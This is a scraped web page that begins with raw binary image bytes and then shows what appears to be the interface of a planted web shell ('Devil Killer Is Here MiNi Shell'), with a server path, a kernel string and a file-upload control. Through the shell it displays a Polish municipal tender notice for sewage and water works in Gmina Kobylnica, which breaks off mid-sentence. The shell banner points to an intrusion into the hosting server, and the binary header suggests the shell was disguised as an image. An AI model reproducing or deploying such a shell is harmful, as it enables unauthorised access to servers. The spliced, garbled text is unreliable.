JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170317/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170317/46446-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.kobylnica.tensoft.pl/' target='_blank'>http://bip.kobylnica.tensoft.pl/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 46446 - 2017
              z dnia 2017-03-17 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kobylnica: Budowa lokalnych systemów zbierania i oczyszczania  ścieków oraz przebudowa urządzeń wodociągowych i budowa infrastruktury towarzyszącej w miejscowościach Ścięgnica, Zagórki, Dobrzęcino, Słonowice, Runowo Sławieńskie, Płaszewo, Zębowo położonych poza granicami aglomeracji Słupsk, na terenie Gminy Kobylnica wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej (Zadanie Nr 1, Zadanie Nr 3, Zadanie Nr 5, Zadanie Nr 6)<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Kobylnica, krajowy numer identyfikacyjny
              77097983200000, ul.
              ul. Główna 
              20,
              76251  
              Kobylnica, woj.
              pomorskie, państwo
              Polska, tel.
              59 842-90-70, e-mail
              a.tantala@kobylnica.eu, faks
              59 842-90-72.
              <br />
              Adres strony internetowej (URL): http://bip.kobylnica.tensoft.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.kobylnica.tensoft.pl/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.kobylnica.tensoft.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br />Adres:  Urząd Gminy Kobylnica ul. Główna 20 76-251 Kobylnica - sekretariat</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa lokalnych systemów zbierania i oczyszczania  ścieków oraz przebudowa urządzeń wodociągowych i budowa infrastruktury towarzyszącej w miejscowościach Ścięgnica, Zagórki, Dobrzęcino, Słonowice, Runowo Sławieńskie, Płaszewo, Zębowo położonych poza granicami aglomeracji Słupsk, na terenie Gminy Kobylnica wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej (Zadanie Nr 1, Zadanie Nr 3, Zadanie Nr 5, Zadanie Nr 6)<br /><b>Numer referencyjny: </b>GIF-IZ.271.RB-5.6.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Zamawiający dopuszcza możliwość składania ofert częściowych na następujące Zadania: 1) Zadanie Nr 1  roboty budowlane dot. budowy lokalnych systemów oczyszczania ścieków oraz budowy infrastruktury towarzyszącej w miejscowościach Ścięgnica, Zagórki, Runowo Sławieńskie, Dobrzęcino, Płaszewo, Zębowo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej 2) Zadanie Nr 3  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowościach Dobrzęcino i Słonowice wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej 3) Zadanie Nr 5  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowości Płaszewo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej 4) Zadanie Nr 6  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków w miejscowości Zębowo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej. 2.Przedmiot zamówienia został szczegółowo opisany w pkt 3.0 SIWZ oraz zgodnie 
z art. 31 PZP za pomocą dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót budowlanych, które stanowią Załącznik Nr 10 do SIWZ (w tym dla Zadania Nr 1  Załącznik Nr 10a do SIWZ, dla Zadania Nr 3  Załącznik Nr 10b do SIWZ, dla Zadania Nr 5  Załącznik Nr 10c do SIWZ, dla Zadania Nr 6  Załącznik Nr 10d do SIWZ). Zgodnie z art. 30 ust. 4 PZP dopuszcza się rozwiązania wskazane w dokumentacji projektowej i specyfikacji technicznych wykonania i odbioru robót budowlanych, zwanej dalej STWiORB lub równoważne. 
<br /><br /><b>II.5) Główny kod CPV: </b><br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca spełni warunek, jeżeli wykaże, że: 
1)	w przypadku składania oferty na Zadanie Nr 1 Wykonawca spełni warunek, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 2 000 000 zł (słownie: dwa miliony zł 00/100)
2)	w przypadku składania oferty na Zadanie Nr 3 Wykonawca spełni warunek, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 900 000 zł (słownie: dziewięćset tysięcy zł 00/100)
3)	w przypadku składania oferty na Zadanie Nr 5 Wykonawca spełni warunek, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 800 000 zł (słownie: osiemset tysięcy zł 00/100)
4)	w przypadku składania oferty na Zadanie Nr 6 Wykonawca spełni warunek, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 600 000 zł (słownie: sześćset tysięcy zł 00/100)
5)	w przypadku składania oferty na więcej niż jedno Zadanie Wykonawca zobowiązany jest wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż suma kwot wskazanych odpowiednio dla każdego Zadania w pkt 5.1.1 ppkt 1, 2, 3 i 4 SIWZ
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek, jeżeli wykaże, że:
1)	posiada wiedzę i doświadczenie w zakresie wykonania robót budowlanych odpowiadających robotom budowlanym stanowiącym przedmiot zamówienia tzn.:
a)	w przypadku składania oferty na Zadanie Nr 1 Wykonawca spełni warunek, jeżeli wykaże, że posiada wiedzę i doświadczenie, co należycie udokumentuje, tj. wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dwie roboty polegające na budowie oczyszczalni ścieków o przepustowości od 150 RLM o wartości brutto nie mniejszej niż 400 000,00 zł każda lub przedstawi pisemne zobowiązania innych podmiotów do oddania mu do dyspozycji ww. wiedzy i doświadczenia 
b)	w przypadku składania oferty na Zadanie Nr 3 Wykonawca spełni warunek, jeżeli wykaże, że posiada wiedzę i doświadczenie, co należycie udokumentuje, tj. wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie jedną lub dwie roboty polegające na budowie sieci wodociągowej i/lub budowie sieci kanalizacji sanitarnej 
o łącznej wartości brutto nie mniejszej niż 400 000,00 zł lub przedstawi pisemne zobowiązania innych podmiotów do oddania mu do dyspozycji ww. wiedzy 
i doświadczenia
c)	w przypadku składania oferty na Zadanie Nr 5 Wykonawca spełni warunek, jeżeli wykaże, że posiada wiedzę i doświadczenie, co należycie udokumentuje, tj. wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie jedną lub dwie roboty polegające na budowie sieci wodociągowej i/lub budowie sieci kanalizacji sanitarnej 
o łącznej wartości brutto nie mniejszej niż 400 000,00 zł lub przedstawi pisemne zobowiązania innych podmiotów do oddania mu do dyspozycji ww. wiedzy 
i doświadczenia
d)	w przypadku składania oferty na Zadanie Nr 6 Wykonawca spełni warunek, jeżeli wykaże, że posiada wiedzę i doświadczenie, co należycie udokumentuje, tj. wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie jedną lub dwie roboty polegające na budowie sieci wodociągowej i/lub budowie sieci kanalizacji sanitarnej 
o łącznej wartości brutto nie mniejszej niż 400 000,00 zł lub przedstawi pisemne zobowiązania innych podmiotów do oddania mu do dyspozycji ww. wiedzy 
i doświadczenia
e)	w przypadku składania oferty na więcej niż jedno Zadanie:
	w tym na Zadanie Nr 1, Wykonawca zobowiązany jest wykazać, iż wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dwie roboty polegające na budowie oczyszczalni ścieków o przepustowości od 150 RLM o wartości brutto nie mniejszej niż 400 000,00 zł każda oraz jedną lub dwie roboty polegające na budowie sieci wodociągowej i/lub budowie sieci kanalizacji sanitarnej 
o łącznej wartości brutto nie mniejszej niż suma wartości brutto wskazanych odpowiednio dla każdego Zadania, w sekcji III.1.3) pkt 1 lit. b, c, d lub przedstawi pisemne zobowiązania innych podmiotów do oddania mu do dyspozycji ww. wiedzy i doświadczenia
	tj. Zadanie Nr 3 lub/i Zadanie Nr 5 lub/i Zadanie Nr 6 Wykonawca zobowiązany jest wykazać, iż wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dwie roboty polegające na budowie sieci wodociągowej i/lub budowie sieci kanalizacji sanitarnej 
o łącznej wartości brutto nie mniejszej niż suma wartości brutto wskazanych odpowiednio dla każdego Zadania, w sekcji III.1.3) pkt 1 lit. b, c, d lub przedstawi pisemne zobowiązania innych podmiotów do oddania mu do dyspozycji ww. wiedzy 
i doświadczenia
2)	dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, tj.: 
a)	w przypadku składania oferty na Zadanie Nr 1 Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował na etapie realizacji umowy w sprawie niniejszego zamówienia publicznego:
	co najmniej osobą zdolną do wykonania zamówienia, która obejmie funkcję kierownika budowy posiadającą uprawnienia budowlane upoważniające do kierowania budową w specjalności instalacyjnej, w zakresie instalacji i urządzeń wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz
	co najmniej osobą zdolną do wykonania zamówienia, która obejmie funkcję kierownika robót posiadającą uprawnienia budowlane upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej, w zakresie instalacji i urządzeń elektrycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz
	co najmniej osobą zdolną do wykonania zamówienia, która obejmie funkcję kierownika robót posiadającą uprawnienia budowlane upoważniające do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
lub wykaże, że będzie dysponował w/w osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w realizacji zamówienia
b)	w przypadku składania oferty na Zadanie Nr 3 lub/i Zadanie Nr 5 lub/i Zadanie 
Nr 6 Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował na etapie realizacji umowy w sprawie niniejszego zamówienia publicznego:
	co najmniej osobą zdolną do wykonania zamówienia, która obejmie funkcję kierownika budowy posiadający uprawnienia budowlane upoważniające 
do kierowania budową w specjalności instalacyjnej, w zakresie sieci wodociągowych 
i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
	co najmniej osobą zdolną do wykonania zamówienia, która obejmie funkcję kierownika robót posiadający uprawnienia budowlane upoważniające do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów
lub wykaże, że będzie dysponował w/w osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w realizacji zamówienia
c)	w przypadku składania oferty na Zadanie Nr 1 i: Zadanie Nr 3 lub/i Zadanie Nr 5 
lub/i Zadanie Nr 6 Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował na etapie realizacji umowy w sprawie niniejszego zamówienia publicznego:
	co najmniej osobą zdolną do wykonania zamówienia, która obejmie funkcję kierownika budowy posiadającą uprawnienia budowlane upoważniające 
do kierowania budową w specjalności instalacyjnej, w zakresie instalacji i urządzeń wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz
	co najmniej osobą zdolną do wykonania zamówienia, która obejmie funkcję kierownika robót posiadającą uprawnienia budowlane upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej, w zakresie instalacji i urządzeń elektrycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz
	co najmniej osobą zdolną do wykonania zamówienia, która obejmie funkcję kierownika robót posiadającą uprawnienia budowlane upoważniające do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
	co najmniej osobą zdolną do wykonania zamówienia, która obejmie funkcję kierownika budowy posiadający uprawnienia budowlane upoważniające do kierowania budową w specjalności instalacyjnej, w zakresie sieci wodociągowych 
i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
	co najmniej osobą zdolną do wykonania zamówienia, która obejmie funkcję kierownika robót posiadający uprawnienia budowlane upoważniające do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów
lub wykaże, że będzie dysponował w/w osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w realizacji zamówienia
Zamawiający dopuszcza możliwość pełnienia przez jedną osobę kilku funkcji.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji 
z otwarcia ofert, o której mowa w art. 86 ust. 5 PZP, przekazuje Zamawiającemu oświadczenie 
o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 PZP, sporządzone według Załącznika Nr 4 do SIWZ. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. 2. W celu potwierdzenia braku podstaw wykluczenia z postępowania o udzielenie zamówienia Wykonawca, którego oferta została najwyżej oceniona, na wezwanie Zamawiającego żąda następujących dokumentów: 1) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 PZP wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 2) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym 
